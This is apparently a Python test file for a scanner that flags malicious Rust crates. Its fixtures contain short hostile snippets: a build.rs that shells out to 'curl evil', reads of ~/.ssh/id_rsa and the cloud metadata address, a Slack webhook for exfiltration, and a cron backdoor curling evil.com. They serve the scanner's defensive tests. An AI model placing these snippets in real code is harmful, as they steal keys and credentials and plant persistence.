"""Tests for CargoStaticAnalysisScanner."""

from app.core.config import Settings
from app.scanners.static_analysis_cargo import CargoStaticAnalysisScanner
from app.schemas.package import PackageInfo


def _make_scanner() -> CargoStaticAnalysisScanner:
    return CargoStaticAnalysisScanner(Settings())


def _make_package() -> PackageInfo:
    return PackageInfo(name="evil-crate", version="0.1.0", registry="cargo")


async def test_clean_rust_file(tmp_path):
    f = tmp_path / "lib.rs"
    f.write_text('fn main() {\n    println!("Hello, world!");\n}\n')
    result = await _make_scanner().scan(_make_package(), [f])
    assert result.verdict == "pass"


async def test_build_rs_shell_execution(tmp_path):
    f = tmp_path / "build.rs"
    f.write_text(
        'use std::process::Command;\nfn main() {\n    Command::new("bash").arg("-c").arg("curl evil").status();\n}\n'
    )
    result = await _make_scanner().scan(_make_package(), [f])
    assert result.verdict == "fail"


async def test_build_rs_severity_boost(tmp_path):
    f = tmp_path / "build.rs"
    f.write_text('use std::process::Command;\nfn main() {\n    Command::new("ls").status();\n}\n')
    result = await _make_scanner().scan(_make_package(), [f])
    # Command in build.rs gets boosted from high to critical
    matches = result.metadata.get("matches", [])
    assert any(m["severity"] == "critical" for m in matches)


async def test_cloud_metadata_access(tmp_path):
    f = tmp_path / "lib.rs"
    f.write_text('let url = "http://169.254.169.254/latest/meta-data/";\n')
    result = await _make_scanner().scan(_make_package(), [f])
    assert result.verdict == "fail"


async def test_ssh_key_theft(tmp_path):
    f = tmp_path / "lib.rs"
    f.write_text('std::fs::read_to_string(format!("{}/.ssh/id_rsa", home));\n')
    result = await _make_scanner().scan(_make_package(), [f])
    assert result.verdict == "fail"


async def test_webhook_exfiltration(tmp_path):
    f = tmp_path / "lib.rs"
    f.write_text('let webhook = "https://hooks.slack.com/services/T00/B00/XXX";\n')
    result = await _make_scanner().scan(_make_package(), [f])
    assert result.verdict == "fail"


async def test_libc_system(tmp_path):
    f = tmp_path / "lib.rs"
    f.write_text("unsafe { libc::system(cmd.as_ptr()); }\n")
    result = await _make_scanner().scan(_make_package(), [f])
    assert result.verdict == "fail"


async def test_extern_c_block(tmp_path):
    f = tmp_path / "lib.rs"
    f.write_text('extern "C" {\n    fn evil_function();\n}\n')
    result = await _make_scanner().scan(_make_package(), [f])
    assert result.verdict == "warn"


async def test_crontab_persistence(tmp_path):
    f = tmp_path / "lib.rs"
    f.write_text('std::fs::write("/etc/cron.d/backdoor", "* * * * * curl evil.com");\n')
    result = await _make_scanner().scan(_make_package(), [f])
    assert result.verdict == "fail"


async def test_generated_code_downgraded(tmp_path):
    f = tmp_path / "build.rs"
    f.write_text('// Generated by bindgen\nuse std::process::Command;\nfn main() { Command::new("ls").status(); }\n')
    result = await _make_scanner().scan(_make_package(), [f])
    matches = result.metadata.get("matches", [])
    for m in matches:
        assert m["severity"] != "critical"


async def test_nonexistent_file(tmp_path):
    f = tmp_path / "missing.rs"
    result = await _make_scanner().scan(_make_package(), [f])
    assert result.verdict == "pass"
